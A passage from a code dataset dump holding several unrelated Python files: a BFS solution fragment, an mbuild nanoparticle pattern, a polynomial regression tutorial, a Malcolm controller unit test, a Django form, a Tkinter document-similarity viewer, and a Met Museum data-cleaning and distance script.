iterate\n\nprint(tomato_bfs(start_points))\n","sub_path":"7000/07576_baekjoon.py","file_name":"07576_baekjoon.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460198624","text":"from __future__ import division\n\nimport mbuild as mb\nimport numpy as np\n\n\nclass SquarePattern(mb.Pattern):\n \"\"\"A nanoparticle coating pattern where points are removed from two opposite poles on two axes.\n\n Parameters\n ----------\n chain_density : float\n Density of chain coating on the nanoparticle (chains / nm^2)\n radius : float\n Radius of the nanoparticle (nm)\n fractional_sa : float\n Fractional surface area of the nanoparticle to exclude coating (nm^2)\n \"\"\"\n def __init__(self, chain_density, radius, fractional_sa, **args):\n pattern = mb.SpherePattern(int(chain_density * 4.0 * np.pi * radius**2.0))\n pattern.scale(radius)\n total_sa = 4.0 * np.pi * radius**2.0\n patch_sa = total_sa * fractional_sa\n cutoff = patch_sa / (8 * np.pi * radius)\n points = np.array([xyz for xyz in pattern.points if xyz[2] < radius-cutoff\n and xyz[2] > cutoff-radius and xyz[1] < radius-cutoff\n and xyz[1] > cutoff-radius])\n super(SquarePattern, self).__init__(points=points, orientations=None)\n\nif __name__ == \"__main__\":\n from save_pattern import save_pattern\n square_pattern = SquarePattern(4.0, 2.0, 0.5)\n save_pattern('test.xyz', square_pattern)\n","sub_path":"cgnp_patchy/lib/patterns/square_pattern.py","file_name":"square_pattern.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140319707","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 25 09:41:03 2020\n\n@author: jagoodka\n\"\"\"\n\n# polynomial regression modelling\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndataset = pd.read_csv('Position_Salaries.csv')\n# basically we want to build a model to check if there is a linear dependence between independent variables (X-es) and dependent variable (y)\n\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, -1].values\n\n# first - linear regression model\nfrom sklearn.linear_model import LinearRegression\n\nlin_reg = LinearRegression()\nlin_reg.fit(X, y)\n\n\n# second - polynomial regression model\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree=4)\nX_poly = poly_reg.fit_transform(X)\npoly_reg.fit(X_poly, y)\n\n# result of polynomial regression is fitted into the linear regression model\nlin_reg2 = LinearRegression()\nlin_reg2.fit(X_poly, y)\n\n# Visualisations\n# linear results\nplt.scatter(X, y, c='y')\nplt.plot(X, lin_reg.predict(X), c='g')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.title('Linear regression')\nplt.show()\n\n# polynomial results\n#X_grid = np.arange(min(X), max(X), 0.1)\n#X_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, c='y')\nplt.plot(X, lin_reg2.predict(poly_reg.fit_transform(X)), c='g')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.title('Polynomial regression')\nplt.show()\n\n# predictions\n# predict salary for a person with given years of experience, I need to pass a 2D array, that's why years_of_experience is placed in double square brackets\nyears_of_experience = [[6.5]]\n\n# linear regression model\nprint(np.round(lin_reg.predict(years_of_experience), 2))\n\n# polynomial regression 
model\nprint(np.round(lin_reg2.predict(poly_reg.fit_transform(years_of_experience)), 2))","sub_path":"SuperDataScience/regression/polynomial_regression/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"440008711","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\nimport setup_malcolm_paths\n\nfrom collections import OrderedDict\n\nimport unittest\nfrom mock import MagicMock, patch, call\n\n# logging\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\n# module imports\nfrom malcolm.controllers import ClientController, HelloController\nfrom malcolm.core.block import Block\nfrom malcolm.vmetas import StringMeta\nfrom malcolm.compat import queue\n\nclass TestClientController(unittest.TestCase):\n\n def setUp(self):\n # Serialized version of the block we want\n source = Block()\n HelloController(MagicMock(), source, \"blockname\")\n self.serialized = source.to_dict()\n # Setup client controller prerequisites\n self.b = Block()\n self.b.name = \"blockname\"\n self.p = MagicMock()\n self.comms = MagicMock()\n self.cc = ClientController(self.p, self.b, \"blockname\")\n # get process to give us comms\n self.p.get_client_comms.return_value = self.comms\n # tell our controller which blocks the process can talk to\n response = MagicMock(id_=self.cc.REMOTE_BLOCKS_ID, value=[\"blockname\"])\n self.cc.put(response)\n # tell our controller the serialized state of the block\n response = MagicMock(id_=self.cc.BLOCK_ID, changes=[[[], self.serialized]])\n self.cc.put(response)\n\n def test_init(self):\n self.assertEqual(self.p.q.put.call_count, 1)\n req = self.p.q.put.call_args[0][0]\n self.assertEqual(req.typeid, \"malcolm:core/Subscribe:1.0\")\n self.assertEqual(req.endpoint, [self.p.name, \"remoteBlocks\", \"value\"])\n self.assertEqual(req.response_queue, self.cc)\n self.p.get_client_comms.assert_called_with(\"blockname\")\n self.assertEqual(self.comms.q.put.call_count, 1)\n req = self.comms.q.put.call_args[0][0]\n self.assertEqual(req.typeid, \"malcolm:core/Subscribe:1.0\")\n self.assertEqual(req.delta, True)\n self.assertEqual(req.response_queue, self.cc)\n self.assertEqual(req.endpoint, [\"blockname\"])\n\n def test_methods_created(self):\n self.assertEqual(list(self.b.methods), [\"disable\", \"reset\", \"say_hello\"])\n m = self.b.methods[\"say_hello\"]\n self.assertEqual(m.name, \"say_hello\")\n self.assertEqual(list(m.takes.elements), [\"name\"])\n self.assertEqual(type(m.takes.elements[\"name\"]), StringMeta)\n self.assertEqual(list(m.returns.elements), [\"greeting\"])\n self.assertEqual(type(m.returns.elements[\"greeting\"]), StringMeta)\n self.assertEqual(m.defaults, {})\n\n def test_call_method(self):\n self.p.create_queue.return_value = queue.Queue()\n def f(request):\n request.respond_with_return(dict(\n greeting=\"Hello %s\" % request.parameters.name))\n self.comms.q.put.side_effect = f\n ret = self.b.say_hello(name=\"me\")\n self.assertEqual(ret.greeting, \"Hello me\")\n\n def test_put_update_response(self):\n response = MagicMock(\n id_=self.cc.BLOCK_ID,\n changes=[[[\"substructure\"], \"change\"]])\n self.b.update = MagicMock()\n self.cc.put(response)\n self.b.update.assert_called_once_with([[\"substructure\"], \"change\"])\n\n def test_put_root_update_response(self):\n attr1 = StringMeta(\"dummy\")\n attr2 = StringMeta(\"dummy2\")\n new_block_structure = {}\n 
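The membership double-loop used in the test above works around dicts being unhashable, but it ignores multiplicity: two equal dicts on one side can both match a single dict on the other. A hedged generic alternative (not part of the Malcolm test suite) that respects duplicates:

def same_items(expected, actual):
    """Order-insensitive equality for lists of unhashable items (e.g. dicts)."""
    unmatched = list(actual)
    for item in expected:
        try:
            unmatched.remove(item)  # list.remove compares with ==, so dicts match by value
        except ValueError:
            return False
    return not unmatched

# same_items([{'a': 1}, {'a': 1}], [{'a': 1}]) -> False, unlike a two-way membership check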
new_block_structure[\"attr1\"] = attr1.to_dict()\n new_block_structure[\"attr2\"] = attr2.to_dict()\n self.b.replace_children = MagicMock()\n response = MagicMock(\n id_=self.cc.BLOCK_ID,\n changes=[[[], new_block_structure]])\n self.cc.put(response)\n self.assertIs(self.b, self.cc.block)\n deserialized_changes = self.b.replace_children.call_args_list[0][0][0]\n serialized_changes = [x.to_dict() for x in\n deserialized_changes.values()]\n expected = [attr1.to_dict(), attr2.to_dict()]\n # dicts are not hashable, so cannot use set compare\n for x in expected:\n self.assertTrue(x in serialized_changes)\n for x in serialized_changes:\n self.assertTrue(x in expected)\n\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"tests/test_controllers/test_clientcontroller.py","file_name":"test_clientcontroller.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"278011933","text":"from django.forms import ModelForm\r\nfrom incoming.models import IncomingApply\r\nfrom lhwms.utils.forms import FormMixin\r\n\r\n\r\nclass IncomingApplyForm(FormMixin, ModelForm):\r\n class Meta:\r\n model = IncomingApply\r\n fields = [\r\n 'apply_cons_mark',\r\n 'mat_mark',\r\n 'mat_type',\r\n 'pars',\r\n 'test_result',\r\n 'wh_mark',\r\n 'num',\r\n ]","sub_path":"lhwms/incoming/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330938119","text":"class person:\n age = 0\n initialAge = 24\n gender = \"male\"\n height = \"6 foot 0 inches\"\n\nnewPerson = person()\nprint(newPerson.age)\nprint(newPerson.height)\n\nclass people:\n def __init__(self,name,age):\n self.name = name\n self.age = age\n\nnew_people = people(\"Katia\",22)\nprint(new_people.name)\nprint(new_people.age)\n\nmyself = people(\"Darius\",24)\nprint(myself.name)\nprint(myself.age)\n\nprint(\"Hi my name is \" + str(myself.name) + \" and I am \" + str(myself.age) + \" years old.\")","sub_path":"2021/Code/Python/DataStructures/class_practice2.py","file_name":"class_practice2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72005041","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 14 08:34:59 2015\n\nParamètres en ligne de commande :\n 1. C:\\Laurence\\ACCELIS\\POC\\GRAPHE_SIM.txt \n 2. C:\\Laurence\\ACCELIS\\POC\\DOCS.txt \n 3. C:\\Laurence\\ACCELIS\\POC\\CR_Bruts\n 4. 
C:\\Laurence\\ACCELIS\\POC\\SITES.txt \n \nC:\\Laurence\\ACCELIS\\POC\\GRAPHE_SIM.txt C:\\Laurence\\ACCELIS\\POC\\DOCS.txt C:\\Laurence\\ACCELIS\\POC\\CR_Bruts C:\\Laurence\\ACCELIS\\POC\\SITES.txt \n\n@author: adm_laurence\n\"\"\"\n\nfrom Tkinter import * \nimport numpy as np\n \n#----------------------------------------------------------------------\n\ndef Valider():\n \n global Wgraphe\n global l_noeuds\n global l_indDocsTraites\n global docs\n global sites\n global nbDocs\n global lib_noeuds\n\n l_indSites = listeSites.curselection()\n l_sites = []\n lib = \"\"\n infoNoeud.set(\"\")\n for ind in l_indSites:\n l_sites.append(sites[ind])\n lib = lib + \" \" + sites[ind]\n \n if len(l_sites) == 0: # pas de site sélectionné\n l_sites = sites # on considère tous les sites\n infoSites.set(\"TOUS SITES\") \n else:\n infoSites.set(\"Pour le(s) site(s) : \" + lib) \n \n visuFic.delete(0.1, END) \n listeNoeuds.delete(0, last=END)\n \n l_noeuds = []\n lib_noeuds = []\n l_indDocsTraites = []\n indNoeud = -1\n \n # Pour chaque document\n for i in range (0, nbDocs):\n elts = docs[i].split(\"_\") # Format du nom des fichiers : Doc__.txt\n if elts[1] in l_sites:\n # Le doc appartient à la liste des sites à traiter\n if i not in l_indDocsTraites:\n # Le doc n'a pas encore été traité\n # On crée un nouveau noeud pour ce doc en racine\n indNoeud += 1\n l_i = [i]\n l_noeuds.append(l_i)\n # On traite le document\n TrtDoc(i, indNoeud, l_sites)\n \n \n listeNoeuds.delete(0, last=END) \n liste.delete(0, last=END)\n \n # Tri par ordre décroissant du nombre de cas par noeud\n l_noeuds.sort(key=lambda e: -len(e))\n \n # Constitution de la liste écran des noeuds\n for index, w in enumerate(l_noeuds):\n l = \"Noeud \" + str(index+1) + \". ----- \" + str(len(w)-1) + \" cas\"\n lib_noeuds.append(l)\n listeNoeuds.insert(END, l)\n\n#----------------------------------------------------------------------\n \ndef immediately(e):\n global l_docsNoeud\n \n sel = liste.curselection()\n nomFic = \"CR_Bruts/\" + l_docsNoeud[sel[0]]\n fic = open(nomFic, \"r\")\n visuFic.delete(0.1, END)\n visuFic.insert(END,fic.read())\n fic.close()\n \n#----------------------------------------------------------------------\n \ndef immediatelyNoeud(e):\n global l_noeuds\n global numNoeud\n global docs\n global Wgraphe\n global l_docsNoeud\n global lib_noeuds\n \n sel = listeNoeuds.curselection() \n numNoeud = sel[0]\n infoNoeud.set(lib_noeuds[numNoeud])\n visuFic.delete(0.1, END) \n liste.delete(0, last=END)\n l_docsNoeud = []\n \n for index, l in enumerate(l_noeuds[numNoeud]):\n if index > 0:\n # On a les indices des documents\n liste.insert(END, str(index) + \". 
\" + docs[l])\n l_docsNoeud.append(docs[l])\n \n#----------------------------------------------------------------------\n\ndef TrtDoc(indDoc, indNoeud, l_sites):\n global l_indDocsTraites\n global l_noeuds\n global nbDocs\n global Wgraphe\n \n if indDoc not in l_indDocsTraites:\n l_indDocsTraites.append(indDoc)\n # Le doc n'est pas déjà répertorié dans un noeud\n # Fait-il partie des sites à traiter ?\n elts = docs[indDoc].split(\"_\") # Format du nom des fichiers : Doc__.txt\n if elts[1] in l_sites:\n # On l'ajoute au noeud traité\n l_noeuds[indNoeud].append(indDoc)\n # On traite le voisinage de ce document\n for j in range (indDoc+1, nbDocs):\n if Wgraphe[indDoc, j] >= float(valueDist.get()):\n TrtDoc(j, indNoeud, l_sites)\n\n#----------------------------------------------------------------------\n\n# Chargement des données\nWgraphe = np.loadtxt(\"GRAPHE_SIM.txt\")\n# Chargement des documents\ndocs = np.loadtxt(\"DOCS.txt\", dtype='str')\nnbDocs = len(docs)\n\nfenetre = Tk()\nfenetre.title(\"Liste des cas similaires\")\n\n# Création d'un widget Entry pour la saisie de la distance\nLabel(text = \"Distance min : \").grid(row=0)\nvalueDist = StringVar() \nvalueDist.set(\"0.1\")\nentreeDist = Entry(fenetre, textvariable = valueDist, width=10)\nentreeDist.grid(row=0, column=1, sticky=W)\n\n\n# Création d'un widget Label Sites\nLabel(text = \"Site(s) : \").grid(row=1, sticky=N+W)\n\n# Création d'un widget Listbox pour la liste des sites\nlisteSites = Listbox(fenetre, width=20, height=7, selectmode = MULTIPLE)\n# Chargement des sites\nsites = np.loadtxt(\"SITES.txt\", dtype='str')\nfor s in sites:\n listeSites.insert(END, s)\n# Création d'un widget Scrollbar associé\nlisteSites.grid(row=1, column=1, sticky=W)\nscrListeSites = Scrollbar(fenetre)\nscrListeSites.grid(row=1, column=2, sticky=NW+SW)\nlisteSites.config(yscrollcommand = scrListeSites.set)\nscrListeSites.config(command = listeSites.yview)\n\n# Création d'un widget Button (bouton Valider)\nbouton_valider = Button(fenetre, text ='VALIDER', bg='green', command = Valider)\nbouton_valider.grid(row=3, column=0)\n\n# Création d'un widget Label pour zone d'information\ninfoSites = StringVar()\ninfoSites.set(\"\")\nmessInfoSites = Label(fenetre, textvariable = infoSites, width=90, anchor=W, bg='grey')\nmessInfoSites.grid(row=3, column=1, columnspan=700, sticky=W)\n\n# Création d'un widget Listbox pour la liste des noeuds \nlisteNoeuds = Listbox(fenetre, width=102, height=5)\nlisteNoeuds.grid(row=4, column=1, columnspan=500, sticky=W)\n# Création d'un widget Scrollbar associé\nscrListeNoeuds = Scrollbar(fenetre)\nscrListeNoeuds.grid(row=4, column=501, sticky=NW+SW)\nlisteNoeuds.config(yscrollcommand = scrListeNoeuds.set)\nscrListeNoeuds.config(command = listeNoeuds.yview)\nlisteNoeuds.bind('<>', immediatelyNoeud)\n\n# Création d'un widget Label pour zone d'information\ninfoNoeud = StringVar()\ninfoNoeud.set(\"\")\nmessInfoNoeud = Label(fenetre, textvariable = infoNoeud, width=90, anchor=W, bg='grey')\nmessInfoNoeud.grid(row=5, column=1, columnspan=700, sticky=W)\n\n\n# Création d'un widget Listbox pour la liste des documents \nliste = Listbox(fenetre, width=102, height=5)\nliste.grid(row=8, column=1, columnspan=500, sticky=W)\n# Création d'un widget Scrollbar associé\nscrListe = Scrollbar(fenetre)\nscrListe.grid(row=8, column=501, sticky=NW+SW)\nliste.config(yscrollcommand = scrListe.set)\nscrListe.config(command = liste.yview)\nliste.bind('<>', immediately)\n\n# Création d'un widget Text pour visualiser le contenu d'un document\nvisuFic = 
\n# Load the data\nWgraphe = np.loadtxt(\"GRAPHE_SIM.txt\")\n# Load the documents\ndocs = np.loadtxt(\"DOCS.txt\", dtype='str')\nnbDocs = len(docs)\n\nfenetre = Tk()\nfenetre.title(\"List of similar cases\")\n\n# Create an Entry widget for typing the minimum distance\nLabel(text = \"Min distance: \").grid(row=0)\nvalueDist = StringVar() \nvalueDist.set(\"0.1\")\nentreeDist = Entry(fenetre, textvariable = valueDist, width=10)\nentreeDist.grid(row=0, column=1, sticky=W)\n\n\n# Create a Label widget for the sites\nLabel(text = \"Site(s): \").grid(row=1, sticky=N+W)\n\n# Create a Listbox widget for the list of sites\nlisteSites = Listbox(fenetre, width=20, height=7, selectmode = MULTIPLE)\n# Load the sites\nsites = np.loadtxt(\"SITES.txt\", dtype='str')\nfor s in sites:\n    listeSites.insert(END, s)\n# Create the associated Scrollbar widget\nlisteSites.grid(row=1, column=1, sticky=W)\nscrListeSites = Scrollbar(fenetre)\nscrListeSites.grid(row=1, column=2, sticky=NW+SW)\nlisteSites.config(yscrollcommand = scrListeSites.set)\nscrListeSites.config(command = listeSites.yview)\n\n# Create a Button widget (validate button)\nbouton_valider = Button(fenetre, text ='VALIDATE', bg='green', command = Valider)\nbouton_valider.grid(row=3, column=0)\n\n# Create a Label widget for an information area\ninfoSites = StringVar()\ninfoSites.set(\"\")\nmessInfoSites = Label(fenetre, textvariable = infoSites, width=90, anchor=W, bg='grey')\nmessInfoSites.grid(row=3, column=1, columnspan=700, sticky=W)\n\n# Create a Listbox widget for the list of nodes \nlisteNoeuds = Listbox(fenetre, width=102, height=5)\nlisteNoeuds.grid(row=4, column=1, columnspan=500, sticky=W)\n# Create the associated Scrollbar widget\nscrListeNoeuds = Scrollbar(fenetre)\nscrListeNoeuds.grid(row=4, column=501, sticky=NW+SW)\nlisteNoeuds.config(yscrollcommand = scrListeNoeuds.set)\nscrListeNoeuds.config(command = listeNoeuds.yview)\nlisteNoeuds.bind('<<ListboxSelect>>', immediatelyNoeud)\n\n# Create a Label widget for an information area\ninfoNoeud = StringVar()\ninfoNoeud.set(\"\")\nmessInfoNoeud = Label(fenetre, textvariable = infoNoeud, width=90, anchor=W, bg='grey')\nmessInfoNoeud.grid(row=5, column=1, columnspan=700, sticky=W)\n\n\n# Create a Listbox widget for the list of documents \nliste = Listbox(fenetre, width=102, height=5)\nliste.grid(row=8, column=1, columnspan=500, sticky=W)\n# Create the associated Scrollbar widget\nscrListe = Scrollbar(fenetre)\nscrListe.grid(row=8, column=501, sticky=NW+SW)\nliste.config(yscrollcommand = scrListe.set)\nscrListe.config(command = liste.yview)\nliste.bind('<<ListboxSelect>>', immediately)\n\n# Create a Text widget to display the content of a document\nvisuFic = Text(fenetre, width=76, height=12, background='yellow')\nvisuFic.grid(row=9, column=1, columnspan=500, sticky=N+W)\n# Create the associated Scrollbar widget\nscrLabel = Scrollbar(fenetre)\nscrLabel.grid(row=9, column=501, sticky=NW+SW)\nvisuFic.config(yscrollcommand = scrLabel.set)\nscrLabel.config(command = visuFic.yview) \nvisuFic.tag_configure(\"search\", background=\"green\")\n\n# Create a Button widget (close button)\nbouton_quitter = Button(fenetre, text ='CLOSE', command=fenetre.destroy).grid(row=11, column=0)\n\n\nfenetre.mainloop()\n\n","sub_path":"AppliGraphe.py","file_name":"AppliGraphe.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"481415193","text":"import pandas as pd\r\nimport numpy as np\r\nimport kmapper\r\nimport sklearn\r\nfrom kmapper import KeplerMapper\r\nimport re\r\nimport scipy as sp\r\nfrom statsmodels.stats.proportion import proportions_ztest\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n'''Keep the desirable features and drop data points with missing value(s) '''\r\ndf = pd.read_csv('MetObjects.csv', encoding=\"ISO-8859-1\")\r\nfeature_names = ['Is Highlight', 'Is Public Domain', 'Object ID', 'Department', 'Object Name', 'Artist Begin Date','Artist End Date', 'Object Begin Date', 'Object End Date', 'Medium', 'Dimensions', 'Credit Line', 'Classification']\r\nX = df[feature_names].dropna(axis=0)\r\n''' Filter out data points whose date information doesn't make sense '''\r\nsub=X[X['Artist Begin Date'] != X['Artist End Date']]\r\nsub=sub[sub['Object Begin Date'] < sub['Object End Date']]\r\n'''Focus on artworks with exactly two measurements.\r\n   Extract numbers from strings. Replace Dimensions with area (product of the two extracted numbers).\r\n   Record Length and Width for each artwork '''\r\nlength=[]\r\nwidth=[]\r\nfor index, row in sub.iterrows():\r\n    l1 = re.findall('\\((.*?) cm', row[10])\r\n    if len(l1) == 1:\r\n        nums = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", l1[0])\r\n        if len(nums) == 2:\r\n            sub.loc[index, 'Dimensions'] = float(nums[0]) * float(nums[1])\r\n            length.append(float(nums[0]))\r\n            width.append(float(nums[1]))\r\n        else:\r\n            sub.drop(index, inplace=True)\r\n    else:\r\n        sub.drop(index, inplace=True)\r\nsub['Length']=length\r\nsub['Width']=width\r\n'''Extract Artist Begin Date and Artist End Date. \r\n   If there is more than one number in this field, take the average. '''\r\ndelimiters = ' ', '|'\r\nregexPattern = '|'.join(map(re.escape, delimiters))\r\nfor index, row in sub.iterrows():\r\n    l2 = list(filter(lambda a: a != '', re.split(regexPattern, row[5])))\r\n    for x in l2:\r\n        if '-' in x and x[0] != '-':\r\n            l2[l2.index(x)] = int(str.split(x, '-')[0])\r\n        elif '/' in x:\r\n            l2[l2.index(x)] = int(str.split(x, '/')[2])\r\n        else:\r\n            l2[l2.index(x)] = int(x)\r\n    sub.loc[index, 'Artist Begin Date'] = int(np.mean(l2))\r\n\r\nfor index, row in sub.iterrows():\r\n    l3 = list(filter(lambda a: a != '', re.split(regexPattern, row[6])))\r\n    for x in l3:\r\n        if '-' in x and x[0] != '-':\r\n            l3[l3.index(x)] = int(str.split(x, '-')[0])\r\n        elif '/' in x:\r\n            l3[l3.index(x)] = int(str.split(x, '/')[2])\r\n        elif x == '9999':\r\n            l3[l3.index(x)] = 1999\r\n        else:\r\n            l3[l3.index(x)] = int(x)\r\n    sub.loc[index, 'Artist End Date'] = int(np.mean(l3))\r\n\r\nsub.to_csv('fullset.csv')\r\n\r\n
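# --- Added example (not part of the original script) ---
# The two date-normalisation loops above apply the same rules; a worked
# illustration as a self-contained helper (hypothetical name, a sketch only,
# assuming the re/np imports of this file): hyphenated ranges keep the first
# year, d/m/y dates keep the year component, and multiple values are averaged.
def _mean_year(field):
    years = []
    for tok in filter(None, re.split(r' |\|', field)):
        if '-' in tok and not tok.startswith('-'):
            years.append(int(tok.split('-')[0]))   # "1850-1860" -> 1850
        elif '/' in tok:
            years.append(int(tok.split('/')[2]))   # "12/04/1850" -> 1850
        else:
            years.append(int(tok))
    return int(np.mean(years))

# _mean_year('1850-1860')   -> 1850
# _mean_year('1840 1860')   -> 1850
# _mean_year('12/04/1850')  -> 1850
# --- End added example ---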
''' To be deleted: temporary reload of the cleaned data from fullset.csv. '''\r\ndf = pd.read_csv('fullset.csv')\r\nsub = df.drop(df.columns[0], axis=1)\r\nsub = sub.drop(columns=['Is Highlight'])\r\n\r\n''' Initialize dictionaries for 'Object Name', 'Medium', 'Credit Line', 'Classification' '''\r\nmydict_name={}\r\nmydict_medium={}\r\nmydict_cl={}\r\nmydict_class={}\r\n\r\n''' Convert the type of these variables (plus 'Department') to 'category', so that we can easily assign them numerical values '''\r\nsub['Department'] = sub['Department'].astype('category')\r\nsub['Object Name'] = sub['Object Name'].astype('category')\r\nsub['Medium'] = sub['Medium'].astype('category')\r\nsub['Credit Line'] = sub['Credit Line'].astype('category')\r\nsub['Classification'] = sub['Classification'].astype('category')\r\n\r\n''' Create new columns in sub and set them to the numerical values of the corresponding columns '''\r\nsub['depart_cat'] = sub['Department'].cat.codes\r\nsub['name_cat'] = sub['Object Name'].cat.codes\r\nsub['med_cat'] = sub['Medium'].cat.codes\r\nsub['cl_cat'] = sub['Credit Line'].cat.codes\r\nsub['class_cat'] = sub['Classification'].cat.codes\r\n\r\n''' Record the correspondence between the numerical values and strings for each of the variables.\r\n    We don't do so for 'Department' because of the way we give a subscore for it (merely comparing if two artworks have the same value). '''\r\ndelimiters = ' and ', ' or ', ' ', ',', ';', '&', '(?)', '(', ')', '/', '|', '.'\r\nregexPattern = '|'.join(map(re.escape, delimiters))\r\nfor idx, item in enumerate(sub['name_cat']):\r\n    mydict_name[item]=list(filter(lambda a: a != '', re.split(regexPattern, sub['Object Name'][idx])))\r\nfor idx, item in enumerate(sub['med_cat']):\r\n    mydict_medium[item]=list(filter(lambda a: a != '', re.split(regexPattern, sub['Medium'][idx])))\r\nfor idx, item in enumerate(sub['cl_cat']):\r\n    delims = ', ', '; '\r\n    rePattern = '|'.join(map(re.escape, delims))\r\n    mydict_cl[item]=list(filter(lambda a: a != '', re.split(rePattern, sub['Credit Line'][idx])))\r\nfor idx, item in enumerate(sub['class_cat']):\r\n    mydict_class[item]=list(filter(lambda a: a != '', re.split(regexPattern, sub['Classification'][idx])))\r\n    '''For Classification, we need to further refine the lists of meaningful words, \r\n    since the words after '-' seem similar to an artwork's Object Name and we decided to discard the part after '-'''\r\n    mydict_class[item]=list(map(lambda x: x.split('-')[0], mydict_class.get(item)))\r\n'''\r\nselected=['Is Public Domain', 'Object Begin Date', 'Object End Date', 'Dimensions','Length', 'Width', 'Artist Begin Date', 'Artist End Date']\r\nsub[selected].to_csv('logistic.csv')\r\n'''\r\n''' Drop the columns with string values and keep only the numerical columns '''\r\nsub = sub.drop(columns=['Department', 'Object Name', 'Medium', 'Credit Line', 'Classification'])\r\n'''Calculate the maximum differences, which will be used in mydist to limit subscores between 0-1.'''\r\nmax_begin=max(sub['Object Begin Date'])-min(sub['Object Begin Date'])\r\nmax_end=max(sub['Object End Date'])-min(sub['Object End Date'])\r\nmax_begin_artist=max(sub['Artist Begin Date'])-min(sub['Artist Begin Date'])\r\nmax_end_artist=max(sub['Artist End Date'])-min(sub['Artist End Date'])\r\nmax_dim=max(sub['Dimensions'])-min(sub['Dimensions'])\r\nmax_len=max(sub['Length'])-min(sub['Length'])\r\nmax_wid=max(sub['Width'])-min(sub['Width'])\r\n\r\n''' Jaccard index. \r\n    a: a set\r\n    b: a set\r\n    Output: Jaccard index for set a and set b.\r\n    '''\r\ndef jaccard(a, b):\r\n    c = a.intersection(b)\r\n    return float(len(c)) / (len(a) + len(b) - len(c))\r\n
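# --- Added example (not part of the original script) ---
# Worked check of jaccard() above: the two sets share one of three distinct
# elements, so the index is 1/3 (values are made up for illustration).
# jaccard({'oil', 'canvas'}, {'oil', 'paper'})  -> 1/3
# jaccard({'silk'}, {'silk'})                   -> 1.0
# --- End added example ---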
\r\n''' Determine similarity between two artworks in terms of some categorical feature\r\n    x: (list of strings) some feature of an artwork\r\n    y: (list of strings) the same feature of another artwork\r\n    v: (string) this feature's name\r\n    Output: a score denoting similarity (1: remote 0: close)\r\n    This function computes the Jaccard distance for x and y.\r\n'''\r\ndef cat_dist(x, y, v):\r\n    return 1-jaccard(x, y)\r\n\r\n'''\r\nCalculate the distance between two artworks.\r\nx: a numpy.ndarray/list that contains an artwork's 13 features\r\ny: a numpy.ndarray/list that contains an artwork's 13 features\r\nOutput: distance between 0-13 (0: close 13: remote)\r\n'''\r\ndef mydist(x, y):\r\n    sc1=0\r\n    sc2=0\r\n    sc3=0\r\n    sc4=0\r\n    sc5=0\r\n    sc6=0\r\n    sc7=0\r\n    sc8=0\r\n    sc9=0\r\n    sc10=0\r\n    sc11=0\r\n    sc12=0\r\n    sc13=0\r\n    ''' Check if the two artworks are the same based on Object Id '''\r\n    if x[0] != y[0]:\r\n        sc1 = 1\r\n    ''' Calculate a score for 'Artist Begin Date' '''\r\n    sc2=abs(x[1]-y[1])/max_begin_artist\r\n    ''' Calculate a score for 'Artist End Date' '''\r\n    sc3=abs(x[2]-y[2])/max_end_artist\r\n    ''' Calculate a score for 'Object Begin Date' '''\r\n    sc4=abs(x[3]-y[3])/max_begin\r\n    ''' Calculate a score for 'Object End Date' '''\r\n    sc5=abs(x[4]-y[4])/max_end\r\n    ''' Calculate a score for 'Dimensions' '''\r\n    sc6 = abs(x[5]-y[5])/max_dim\r\n    sc7 = abs(x[6]-y[6])/max_len\r\n    sc8 = abs(x[7]-y[7])/max_wid\r\n    ''' Calculate a score for 'Department'; since there are only 19 different values for this feature,\r\n        we simply check if two artworks have the same value'''\r\n    if x[8] != y[8]:\r\n        sc9=1\r\n    ''' Calculate a score for 'Object Name' using cat_dist '''\r\n    sc10=cat_dist(set(mydict_name.get(x[9])), set(mydict_name.get(y[9])), 'Object Name')\r\n    ''' Calculate a score for 'Medium' using cat_dist '''\r\n    sc11= cat_dist(set(mydict_medium.get(x[10])), set(mydict_medium.get(y[10])), 'Medium')\r\n    ''' Calculate a score for 'Credit Line' using cat_dist '''\r\n    sc12 = cat_dist(set(mydict_cl.get(x[11])), set(mydict_cl.get(y[11])), 'Credit Line')\r\n    ''' Calculate a score for 'Classification' using cat_dist '''\r\n    sc13 = cat_dist(set(mydict_class.get(x[12])), set(mydict_class.get(y[12])), 'Classification')\r\n    '''We add up the scores to give the distance between x and y.\r\n    print([sc1, sc2, sc3, sc4, sc5, sc6, sc7, sc8, sc9, sc10, sc11, sc12, sc13])'''\r\n    return sc1+sc2+sc3+sc4+sc5+sc6+sc7+sc8+sc9+sc10+sc11+sc12+sc13\r\n\r\n'''lenses: eccentricity, L-infinity centrality.\r\n   Note: defined here but unused below (the MDS embedding is used as the lens instead).'''\r\ndef eccentricity(x):\r\n    dist_sum=0\r\n    for y in sub.values:\r\n        